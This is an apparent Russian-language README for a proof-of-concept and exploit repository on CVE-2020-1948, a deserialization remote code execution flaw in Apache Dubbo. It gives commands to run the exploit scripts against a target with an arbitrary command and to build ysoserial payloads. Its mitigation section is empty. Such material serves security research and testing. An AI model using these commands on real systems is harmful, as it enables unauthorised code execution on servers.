
[CVE-2020-1948] Apache Dubbo Provider: десериализация по умолчанию приводит к RCE
Этот репозиторий содержит исследовательские материалы, код доказательства концепции и инструменты эксплуатации, связанные с уязвимостями десериализации Apache Dubbo, в первую очередь с CVE-2020-1948.
Версии Apache Dubbo до 2.7.8, 2.6.9 и 2.5.10 уязвимы к атаке удаленного выполнения кода (CVE-2020-1948) из-за небезопасной десериализации. Уязвимость затрагивает компонент Dubbo Provider, который использует нативную сериализацию Java без надлежащей проверки.
Эта уязвимость может быть использована через несколько векторов:
# Clone and build a vulnerable Dubbo version
cd dubbo-dubbo-2.7.5
mvn clean package
# Run the proof of concept
python dubboPoc.py -t <target_ip> -p <target_port>
# Run the exploit
python dubboExp.py -t <target_ip> -p <target_port> -c "command_to_execute"
Вы можете использовать ysoserial.jar для генерации пользовательских полезных нагрузок:
java -jar ysoserial.jar CommonsCollections1 "command_to_execute" > payload.ser
Для защиты от этих уязвимостей:
Этот репозиторий предназначен только для исследовательских и образовательных целей в области безопасности. Предоставленный код и инструменты следует использовать только против систем, на тестирование которых у вас есть разрешение. Любое неправильное использование этой информации не является ответственностью владельца репозитория.